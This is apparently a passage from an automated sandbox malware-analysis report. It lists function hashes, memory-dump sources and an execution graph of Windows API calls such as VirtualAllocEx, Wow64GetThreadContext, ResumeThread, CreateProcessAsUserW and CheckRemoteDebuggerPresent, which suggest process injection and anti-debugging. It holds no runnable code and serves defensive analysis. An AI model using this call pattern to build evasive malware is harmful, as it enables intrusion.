                                                        • Opcode ID: a5f8b5c7e6979d4e4c01d4a13f2c9a2b99c37d1c1a594f3eaa7d0fc5a9a381b7
                                                        • Instruction ID: 20a927476db89b6327ff5e9ac9975aad6d6c22c1fee9fbd52bd45c42bc40b22e
                                                        • Opcode Fuzzy Hash: a5f8b5c7e6979d4e4c01d4a13f2c9a2b99c37d1c1a594f3eaa7d0fc5a9a381b7
                                                        • Instruction Fuzzy Hash: 06E012B1A04254AFDB59DB6CA4557AFBBE9DF85260B1440ABE009E3251C93168008B58
                                                        Function 01134AF0 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b073506707c36c9113d388ddd43a65573da53125020cfc476d2a57683710799b
                                                        • Instruction ID: 60b3d4616387e41030426b0090235393ea322bf7a8090527b2680fb435c7c5ea
                                                        • Opcode Fuzzy Hash: b073506707c36c9113d388ddd43a65573da53125020cfc476d2a57683710799b
                                                        • Instruction Fuzzy Hash: 44D01731A04054CACF2C8AA8B4902AC7361F7C8316B114966D6178694CDB2188168656
                                                        Function 01134AFA Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e917f4598c1f1706a0b119048f56f4271b4e6f8ed93ed888eaab38223eee6f1
                                                        • Instruction ID: 484e0227dee34f01a7e127384a822ea3fd5626e2f9ba8144795f42c31da3dcd3
                                                        • Opcode Fuzzy Hash: 8e917f4598c1f1706a0b119048f56f4271b4e6f8ed93ed888eaab38223eee6f1
                                                        • Instruction Fuzzy Hash: 07D05E31B04054CFCF2C8EE8B4902AC7361F7C8316F104D66D617C350CDB3188128652
                                                        Function 01138F55 Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08e374c7dd0011f0e3cedcf43df1fe5aaa0435e735733e464836300857d3968f
                                                        • Instruction ID: 30c1ff4090cea93572d6843fe4a4898b4f9954d95bc3dcc86ab043b83ac9b7a1
                                                        • Opcode Fuzzy Hash: 08e374c7dd0011f0e3cedcf43df1fe5aaa0435e735733e464836300857d3968f
                                                        • Instruction Fuzzy Hash: 65D0673BB40008DFCB049F99E8809DDF776FB9C321B048516F925A3264CA719926DBA0
                                                        Function 01137498 Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d693e7cf02b546b05006deae2a0fa46d0d40b2da1c5206470145166adb3ee0a8
                                                        • Instruction ID: 35aa0c4360c0a8bc0c07c8f6c592aef242ef59aca04d43b5df14dd043f9b2814
                                                        • Opcode Fuzzy Hash: d693e7cf02b546b05006deae2a0fa46d0d40b2da1c5206470145166adb3ee0a8
                                                        • Instruction Fuzzy Hash: 71E0C2344002428FCB01E738E9D5A8D7BA1FF40308F044504E0454B32BCE309857CB80
                                                        Function 0113B461 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 382a46366c5cc96b9ac598cfb37a79f9040b1f7880e21ff54fe2f622a2c799a7
                                                        • Instruction ID: 02d66edbb78c6639c14d421cdca61902673793241ac0b433d8f57938a6bbab1b
                                                        • Opcode Fuzzy Hash: 382a46366c5cc96b9ac598cfb37a79f9040b1f7880e21ff54fe2f622a2c799a7
                                                        • Instruction Fuzzy Hash: 80D09234301149CFEB599B28C448A1A73A2BFC8205F2582A9E54A8B369DA31DC86DB41
                                                        Function 011374A8 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f053f270992b081774c0ad63ece2db8ef074efbfd3d015c298967f11a2f7551
                                                        • Instruction ID: ca9d68ffd26256c0ec3c69a4db6a309f72dbd4601819c4adc94d8ceb0aec8a56
                                                        • Opcode Fuzzy Hash: 9f053f270992b081774c0ad63ece2db8ef074efbfd3d015c298967f11a2f7551
                                                        • Instruction Fuzzy Hash: 2BC0123441020B8AD501F765ED8555977DEEE80B087449914A10D0B71DDE74994697D5

                                                        Non-executed Functions

                                                        Function 0970C1B8 Relevance: .8, Instructions: 804COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400340221.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 09700000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9700000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b1eda7c02921b76adadb3cdf63433faf13a39bd9550ec6eda8aa054c9054242
                                                        • Instruction ID: 1a7c5ee8e1ded429d873bba4a1cf8ee54ba2b7aaf36afdb25eb67e94529bfe2d
                                                        • Opcode Fuzzy Hash: 3b1eda7c02921b76adadb3cdf63433faf13a39bd9550ec6eda8aa054c9054242
                                                        • Instruction Fuzzy Hash: AB42E131B006008FDB14AB79C86576E77E6BFC8310F288669E15AEB3E5CE34DC468795
                                                        Function 0B2F2AF0 Relevance: .6, Instructions: 595COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c44da8e8f08bc37211292fd782f4a94c53b8b517b7ab3a2b14688ee40dcf5ae
                                                        • Instruction ID: aad2c656e634ce9f72bc0e8badca43b146560d6bc2b223805ed547f1ba348fff
                                                        • Opcode Fuzzy Hash: 4c44da8e8f08bc37211292fd782f4a94c53b8b517b7ab3a2b14688ee40dcf5ae
                                                        • Instruction Fuzzy Hash: 88326F31E112158FCB08EFB9D984A6EBBF2BF88700F5185A9D049EB354EE349945CB91
                                                        Function 09AF0040 Relevance: .6, Instructions: 558COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86ae0e66cb9df90de48e26c531ec9d1683decf80a65b9d35ee081cfe20d18bc8
                                                        • Instruction ID: f75b1e9fbb091b99c68a53012267783eeb5d7ae7a4d06fe7cb501605eed9b05f
                                                        • Opcode Fuzzy Hash: 86ae0e66cb9df90de48e26c531ec9d1683decf80a65b9d35ee081cfe20d18bc8
                                                        • Instruction Fuzzy Hash: BF129A31B12265CBDB08BFFADD9466DBBF2BF88A00F518529D049E7344DE389815CB91
                                                        Function 0970A770 Relevance: .3, Instructions: 319COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400340221.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 09700000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9700000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d0d989acab080024dce87058bf7f7b31b902e7f4b4ce307cd2fdbdfd8c28a186
                                                        • Instruction ID: 97842221fe21d27984b40bf3ddcc31e44cdbf2f62e72bbe4d4282b10299f4844
                                                        • Opcode Fuzzy Hash: d0d989acab080024dce87058bf7f7b31b902e7f4b4ce307cd2fdbdfd8c28a186
                                                        • Instruction Fuzzy Hash: 24A1B270B006459FEB18BBB9C82436F77E7AFC8640F14856DA14AEB3D4CE389C428795
                                                        Function 098AD558 Relevance: .3, Instructions: 315COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ccd609d19db2f5f6ad21d60a7cae5c3b93e686352d8baecb578b627632e97cf3
                                                        • Instruction ID: 9744868f1f07d9a772552a52d80575cf1469e25cb4c99e5d2615e95e5aa88881
                                                        • Opcode Fuzzy Hash: ccd609d19db2f5f6ad21d60a7cae5c3b93e686352d8baecb578b627632e97cf3
                                                        • Instruction Fuzzy Hash: 8212CFF0C89746CAEB10CF25E9592A53BB1F745328B519A08D2711F2F1D7BA11ABCF84
                                                        Function 0B2F9410 Relevance: .3, Instructions: 298COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a155799e9aad890900c5baf1461086597486ad072fcdc5e5774ed5062fe534e1
                                                        • Instruction ID: 013b2cf74d809a74761c62dc7d39fa2cc811f67df2cebce18518c64ba356fee0
                                                        • Opcode Fuzzy Hash: a155799e9aad890900c5baf1461086597486ad072fcdc5e5774ed5062fe534e1
                                                        • Instruction Fuzzy Hash: 5AD1B174A102068FDB18DF69C598BA9B7F2AF8C701F2580A8E505AB361DB31ED41CF60
                                                        Function 0972BDC0 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec48062fe4aba1d638c89f8ff92fcdc1736d659b5d33fbd8cbff530bceeb4d34
                                                        • Instruction ID: 3854748544f14e7e2342faebac4d01015f87362ee6e4bc759e4afb2856409701
                                                        • Opcode Fuzzy Hash: ec48062fe4aba1d638c89f8ff92fcdc1736d659b5d33fbd8cbff530bceeb4d34
                                                        • Instruction Fuzzy Hash: 48D1F63191075A8ADB00EF64D990AE9B7B1FF95300F10879AD50977221EB70AAC9CF91
                                                        Function 0972BDBC Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0dbaa6d05f85824e68afc3c5f05cddea57cc666bc181cf1a5b55dd6e90f6df10
                                                        • Instruction ID: 2855fb84227d61d114c608d9192444b7fc7f4e3c56f116bf534bb751702fe1e2
                                                        • Opcode Fuzzy Hash: 0dbaa6d05f85824e68afc3c5f05cddea57cc666bc181cf1a5b55dd6e90f6df10
                                                        • Instruction Fuzzy Hash: 58D1F63191075ACADB10EF64D990AEDB7B1FF95300F10879AE50977221EB70AAC9CF91
                                                        Function 098AABC4 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4a463a211a83c770f88eaa1e34560922a626dacc66d13526746d8dfc01c9e07
                                                        • Instruction ID: 5d1a335f147dab3411d5efce436e802876773b7d2ca8494c63938fc27a4db3bf
                                                        • Opcode Fuzzy Hash: e4a463a211a83c770f88eaa1e34560922a626dacc66d13526746d8dfc01c9e07
                                                        • Instruction Fuzzy Hash: FFA15D32E002098FDF09DFA5C4845AEB7B6FF89300B15856EE905EB365DB35E956CB40
                                                        Function 098AD548 Relevance: .2, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7a30a8eca9d3c896b90cdc5f7aba726ce51de0b04ed3f234dd04a69e37e93fb
                                                        • Instruction ID: bd71c91f992f1a49d052f0feac5e7811038a8398c127ca856766efff671612e1
                                                        • Opcode Fuzzy Hash: b7a30a8eca9d3c896b90cdc5f7aba726ce51de0b04ed3f234dd04a69e37e93fb
                                                        • Instruction Fuzzy Hash: 13C107B0C89745CBEB10DF25E9592A93BB1FB85324F114B09D1616F2E0D7B914ABCF84
                                                        Function 04BD4D77 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390078698.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4bd0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee73e738d1510994d91a95ec2d80a1362886e7a51a71ef04e9fb975a6b1064ed
                                                        • Instruction ID: af0b71cd167b57e5eb738084557b31c4e88be0949482c4f2b6a99a45ceaafd92
                                                        • Opcode Fuzzy Hash: ee73e738d1510994d91a95ec2d80a1362886e7a51a71ef04e9fb975a6b1064ed
                                                        • Instruction Fuzzy Hash: 8E21AAC3E4496ADBEF12540EA5A13EA4780C377119F0062C7D36D993D6F865DDA3F242

                                                        Execution Graph

                                                        Execution Coverage:23%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:1.3%
                                                        Total number of Nodes:384
                                                        Total number of Limit Nodes:26
                                                        execution_graph 75291 852be50 75292 852be90 VirtualAllocEx 75291->75292 75294 852becd 75292->75294 75295 852cbd0 75296 852cc10 ResumeThread 75295->75296 75298 852cc41 75296->75298 75299 85b9158 75300 85b91a0 VirtualProtect 75299->75300 75301 85b91da 75300->75301 75302 135d0f0 75303 135d108 75302->75303 75304 135d162 75303->75304 75307 557dd69 75303->75307 75312 557dd78 75303->75312 75308 557dd78 75307->75308 75309 557ddd7 75308->75309 75317 557def0 75308->75317 75322 557df00 75308->75322 75309->75309 75313 557dda5 75312->75313 75314 557ddd7 75313->75314 75315 557df00 2 API calls 75313->75315 75316 557def0 2 API calls 75313->75316 75314->75314 75315->75314 75316->75314 75319 557df00 75317->75319 75318 557dfa0 75318->75309 75327 557dfa8 75319->75327 75331 557dfb8 75319->75331 75324 557df14 75322->75324 75323 557dfa0 75323->75309 75325 557dfb8 2 API calls 75324->75325 75326 557dfa8 2 API calls 75324->75326 75325->75323 75326->75323 75328 557dfb8 75327->75328 75329 557dfc9 75328->75329 75334 557f570 75328->75334 75329->75318 75332 557dfc9 75331->75332 75333 557f570 2 API calls 75331->75333 75332->75318 75333->75332 75338 557f5a0 75334->75338 75342 557f591 75334->75342 75335 557f58a 75335->75329 75339 557f5e2 75338->75339 75341 557f5e9 75338->75341 75340 557f63a CallWindowProcW 75339->75340 75339->75341 75340->75341 75341->75335 75343 557f5a0 75342->75343 75344 557f63a CallWindowProcW 75343->75344 75345 557f5e9 75343->75345 75344->75345 75345->75335 75665 85b8170 75666 85b8184 75665->75666 75667 85b8211 75666->75667 75677 85202a4 75666->75677 75683 852133c 75666->75683 75688 85202e8 75666->75688 75692 8520c4e 75666->75692 75697 8520ebb 75666->75697 75701 852021b 75666->75701 75705 8520aea 75666->75705 75709 8520c0a 75666->75709 75716 8520377 75666->75716 75678 85202a5 75677->75678 75720 85227d0 75677->75720 75724 85227d8 75677->75724 75679 85227d0 VirtualProtect 75678->75679 75680 85227d8 VirtualProtect 75678->75680 75679->75678 75680->75678 75684 8521345 75683->75684 75686 85227d0 VirtualProtect 75684->75686 75687 85227d8 VirtualProtect 75684->75687 75685 8521357 75686->75685 75687->75685 75689 85202a5 75688->75689 75689->75688 75690 85227d0 VirtualProtect 75689->75690 75691 85227d8 VirtualProtect 75689->75691 75690->75689 75691->75689 75693 8520c0b 75692->75693 75694 8520c51 75692->75694 75693->75692 75695 85227d0 VirtualProtect 75693->75695 75696 85227d8 VirtualProtect 75693->75696 75695->75693 75696->75693 75699 85227d0 VirtualProtect 75697->75699 75700 85227d8 VirtualProtect 75697->75700 75698 8520ece 75699->75698 75700->75698 75703 85227d0 VirtualProtect 75701->75703 75704 85227d8 VirtualProtect 75701->75704 75702 852017f 75702->75666 75703->75702 75704->75702 75707 85227d0 VirtualProtect 75705->75707 75708 85227d8 VirtualProtect 75705->75708 75706 8520afb 75707->75706 75708->75706 75710 8520c0b 75709->75710 75712 85227d0 VirtualProtect 75709->75712 75713 85227d8 VirtualProtect 75709->75713 75711 8520c51 75710->75711 75714 85227d0 VirtualProtect 75710->75714 75715 85227d8 VirtualProtect 75710->75715 75712->75710 75713->75710 75714->75710 75715->75710 75718 85227d0 VirtualProtect 75716->75718 75719 85227d8 VirtualProtect 75716->75719 75717 852038b 75718->75717 75719->75717 75721 85227d5 VirtualProtect 75720->75721 75723 852285a 75721->75723 75723->75678 75725 8522820 VirtualProtect 75724->75725 75726 852285a 75725->75726 75726->75678 75346 78f1043 75348 78f1053 75346->75348 75347 78f2252 75348->75347 75351 7c50628 75348->75351 75356 7c50638 75348->75356 75352 7c50662 75351->75352 75361 7c57678 75352->75361 75366 7c57667 75352->75366 75353 7c55dd3 75353->75347 75357 7c50662 75356->75357 75359 7c57667 2 API calls 75357->75359 75360 7c57678 2 API calls 75357->75360 75358 7c55dd3 75358->75347 75359->75358 75360->75358 75362 7c576a1 75361->75362 75371 7c57940 75362->75371 75375 7c578dd 75362->75375 75365 7c57784 75365->75353 75367 7c576a1 75366->75367 75369 7c57940 2 API calls 75367->75369 75370 7c578dd 2 API calls 75367->75370 75368 7c57784 75368->75353 75369->75368 75370->75368 75372 7c57956 75371->75372 75379 7c58040 75372->75379 75376 7c578ee 75375->75376 75378 7c58040 2 API calls 75376->75378 75377 7c57c2a 75377->75365 75378->75377 75380 7c58055 75379->75380 75384 7c58338 75380->75384 75388 7c582ff 75380->75388 75381 7c57c2a 75381->75365 75385 7c5837e DeleteFileW 75384->75385 75387 7c583b7 75385->75387 75387->75381 75389 7c5830c DeleteFileW 75388->75389 75391 7c583b7 75389->75391 75391->75381 75392 78f0040 75393 78f006c 75392->75393 75397 78f2a28 75393->75397 75402 78f2a38 75393->75402 75394 78f014f 75398 78f2a59 75397->75398 75407 78f2b40 75398->75407 75412 78f2b30 75398->75412 75399 78f2abd 75399->75394 75403 78f2a59 75402->75403 75405 78f2b30 6 API calls 75403->75405 75406 78f2b40 6 API calls 75403->75406 75404 78f2abd 75404->75394 75405->75404 75406->75404 75408 78f2b61 75407->75408 75417 78f2be8 75408->75417 75422 78f2bd8 75408->75422 75409 78f2b9a 75409->75399 75413 78f2b40 75412->75413 75415 78f2bd8 6 API calls 75413->75415 75416 78f2be8 6 API calls 75413->75416 75414 78f2b9a 75414->75399 75415->75414 75416->75414 75418 78f2c1b 75417->75418 75419 78f2c9c 75418->75419 75427 78f5af8 75418->75427 75433 78f5ae9 75418->75433 75419->75409 75423 78f2c1b 75422->75423 75424 78f2c9c 75423->75424 75425 78f5ae9 6 API calls 75423->75425 75426 78f5af8 6 API calls 75423->75426 75424->75409 75425->75424 75426->75424 75428 78f5b23 75427->75428 75430 78f5dab 75428->75430 75439 78f83e8 75428->75439 75429 78f5de9 75429->75419 75430->75429 75443 78fa708 75430->75443 75434 78f5af8 75433->75434 75436 78f5dab 75434->75436 75438 78f83e8 4 API calls 75434->75438 75435 78f5de9 75435->75419 75436->75435 75437 78fa708 3 API calls 75436->75437 75437->75435 75438->75436 75448 78f8403 75439->75448 75453 78f8410 75439->75453 75440 78f83ee 75440->75430 75445 78fa739 75443->75445 75444 78fa75d 75444->75429 75445->75444 75496 78fa8c8 75445->75496 75500 78fa8bb 75445->75500 75449 78f8410 75448->75449 75457 78f8508 75449->75457 75467 78f84f7 75449->75467 75450 78f841f 75450->75440 75455 78f8508 3 API calls 75453->75455 75456 78f84f7 3 API calls 75453->75456 75454 78f841f 75454->75440 75455->75454 75456->75454 75458 78f8519 75457->75458 75461 78f853c 75457->75461 75477 78f77fc 75458->75477 75461->75450 75462 78f8534 75462->75461 75463 78f8740 GetModuleHandleW 75462->75463 75464 78f876d 75463->75464 75464->75450 75468 78f8508 75467->75468 75469 78f77fc GetModuleHandleW 75468->75469 75471 78f853c 75468->75471 75470 78f8524 75469->75470 75470->75471 75475 78f8790 2 API calls 75470->75475 75476 78f87a0 2 API calls 75470->75476 75471->75450 75472 78f8534 75472->75471 75473 78f8740 GetModuleHandleW 75472->75473 75474 78f876d 75473->75474 75474->75450 75475->75472 75476->75472 75478 78f86f8 GetModuleHandleW 75477->75478 75480 78f8524 75478->75480 75480->75461 75481 78f87a0 75480->75481 75486 78f8790 75480->75486 75482 78f77fc GetModuleHandleW 75481->75482 75483 78f87b4 75482->75483 75484 78f87d9 75483->75484 75492 78f7860 75483->75492 75484->75462 75487 78f87a0 75486->75487 75488 78f77fc GetModuleHandleW 75487->75488 75489 78f87b4 75488->75489 75490 78f87d9 75489->75490 75491 78f7860 LoadLibraryExW 75489->75491 75490->75462 75491->75490 75493 78f8980 LoadLibraryExW 75492->75493 75495 78f89f9 75493->75495 75495->75484 75497 78fa8d5 75496->75497 75498 78fa90f 75497->75498 75504 78f9288 75497->75504 75498->75444 75501 78fa8c8 75500->75501 75502 78fa90f 75501->75502 75503 78f9288 3 API calls 75501->75503 75502->75444 75503->75502 75505 78f9293 75504->75505 75507 78fb620 75505->75507 75508 78faa3c 75505->75508 75507->75507 75509 78faa47 75508->75509 75513 78fd3e8 75509->75513 75519 78fd3d0 75509->75519 75510 78fb6c9 75510->75507 75515 78fd419 75513->75515 75516 78fd51a 75513->75516 75514 78fd425 75514->75510 75515->75514 75524 78fe10b 75515->75524 75534 78fe118 75515->75534 75516->75510 75521 78fd3e8 75519->75521 75520 78fd425 75520->75510 75521->75520 75522 78fe10b 3 API calls 75521->75522 75523 78fe118 3 API calls 75521->75523 75522->75520 75523->75520 75525 78fe118 75524->75525 75530 78fe671 GetModuleHandleW 75525->75530 75531 78fe680 GetModuleHandleW 75525->75531 75526 78fe1c6 75527 78f77fc GetModuleHandleW 75526->75527 75529 78fe1f2 75526->75529 75528 78fe236 75527->75528 75532 78feff1 CreateWindowExW CreateWindowExW 75528->75532 75533 78ff000 CreateWindowExW 75528->75533 75530->75526 75531->75526 75532->75529 75533->75529 75535 78fe143 75534->75535 75540 78fe671 GetModuleHandleW 75535->75540 75541 78fe680 GetModuleHandleW 75535->75541 75536 78fe1c6 75537 78f77fc GetModuleHandleW 75536->75537 75539 78fe1f2 75536->75539 75538 78fe236 75537->75538 75542 78feff1 CreateWindowExW CreateWindowExW 75538->75542 75543 78ff000 CreateWindowExW 75538->75543 75540->75536 75541->75536 75542->75539 75543->75539 75727 78fade0 75728 78fae26 GetCurrentProcess 75727->75728 75730 78fae78 GetCurrentThread 75728->75730 75731 78fae71 75728->75731 75732 78faeae 75730->75732 75733 78faeb5 GetCurrentProcess 75730->75733 75731->75730 75732->75733 75734 78faeeb 75733->75734 75740 78fafb0 75734->75740 75744 78fafc0 75734->75744 75747 78fb3a0 75734->75747 75735 78faf13 GetCurrentThreadId 75736 78faf44 75735->75736 75741 78fafc0 75740->75741 75749 78fa9d8 75741->75749 75745 78fa9d8 DuplicateHandle 75744->75745 75746 78fafee 75745->75746 75746->75735 75748 78fb3ae 75747->75748 75748->75735 75750 78fb028 DuplicateHandle 75749->75750 75751 78fafee 75750->75751 75751->75735 75544 852c6c0 75545 852c708 VirtualProtectEx 75544->75545 75547 852c746 75545->75547 75548 852b780 75549 852b7c5 Wow64GetThreadContext 75548->75549 75551 852b80d 75549->75551 75752 5576a20 75753 5576a32 75752->75753 75758 78f9e02 75753->75758 75762 78f9e08 75753->75762 75765 78f9f90 75753->75765 75769 78f9f88 75753->75769 75759 78f9e08 CheckRemoteDebuggerPresent 75758->75759 75761 78f9e8e 75759->75761 75761->75753 75763 78f9e4c CheckRemoteDebuggerPresent 75762->75763 75764 78f9e8e 75763->75764 75764->75753 75766 78f9fd6 OutputDebugStringW 75765->75766 75768 78fa00f 75766->75768 75768->75753 75770 78f9f90 OutputDebugStringW 75769->75770 75772 78fa00f 75770->75772 75772->75753 75552 8524048 75553 852406f 75552->75553 75554 85240b7 75553->75554 75557 8524a99 75553->75557 75562 8524aa6 75553->75562 75558 8524ac5 75557->75558 75559 8524f0c 75558->75559 75567 8527888 75558->75567 75582 85277c0 75558->75582 75559->75553 75563 8524adb 75562->75563 75564 8524f0c 75563->75564 75565 85277c0 12 API calls 75563->75565 75566 8527888 12 API calls 75563->75566 75564->75553 75565->75563 75566->75563 75581 85278af 75567->75581 75568 8527973 75568->75558 75581->75568 75597 8526fc2 75581->75597 75602 852700f 75581->75602 75607 8527048 75581->75607 75612 8527249 75581->75612 75617 8526f78 75581->75617 75622 8526f68 75581->75622 75627 85270a1 75581->75627 75632 85270f5 75581->75632 75637 85271c3 75581->75637 75642 8527380 75581->75642 75647 8527212 75581->75647 75652 8527133 75581->75652 75583 85277c5 75582->75583 75584 8527973 75583->75584 75585 8526fc2 CreateProcessAsUserW 75583->75585 75586 8527212 CreateProcessAsUserW 75583->75586 75587 8527133 CreateProcessAsUserW 75583->75587 75588 85271c3 CreateProcessAsUserW 75583->75588 75589 8527380 CreateProcessAsUserW 75583->75589 75590 85270a1 CreateProcessAsUserW 75583->75590 75591 85270f5 CreateProcessAsUserW 75583->75591 75592 8526f78 CreateProcessAsUserW 75583->75592 75593 8526f68 CreateProcessAsUserW 75583->75593 75594 8527048 CreateProcessAsUserW 75583->75594 75595 8527249 CreateProcessAsUserW 75583->75595 75596 852700f CreateProcessAsUserW 75583->75596 75584->75558 75585->75583 75586->75583 75587->75583 75588->75583 75589->75583 75590->75583 75591->75583 75592->75583 75593->75583 75594->75583 75595->75583 75596->75583 75598 8526f86 75597->75598 75599 8526f7d 75597->75599 75598->75581 75599->75598 75600 8529c71 CreateProcessAsUserW 75599->75600 75601 8529ce8 75600->75601 75601->75601 75604 8527034 75602->75604 75603 8527043 75603->75581 75604->75603 75605 8529c71 CreateProcessAsUserW 75604->75605 75606 8529ce8 75605->75606 75609 8527052 75607->75609 75608 852705d 75608->75581 75609->75608 75610 8529c71 CreateProcessAsUserW 75609->75610 75611 8529ce8 75610->75611 75614 8527253 75612->75614 75613 852725b 75613->75581 75614->75613 75615 8529c71 CreateProcessAsUserW 75614->75615 75616 8529ce8 75615->75616 75616->75616 75619 8526f7d 75617->75619 75618 8526f86 75618->75581 75619->75618 75620 8529c71 CreateProcessAsUserW 75619->75620 75621 8529ce8 75620->75621 75621->75621 75624 8526f7d 75622->75624 75623 8526f86 75623->75581 75624->75623 75625 8529c71 CreateProcessAsUserW 75624->75625 75626 8529ce8 75625->75626 75626->75626 75629 8527021 75627->75629 75628 8527043 75628->75581 75629->75628 75630 8529c71 CreateProcessAsUserW 75629->75630 75631 8529ce8 75630->75631 75633 85270d5 75632->75633 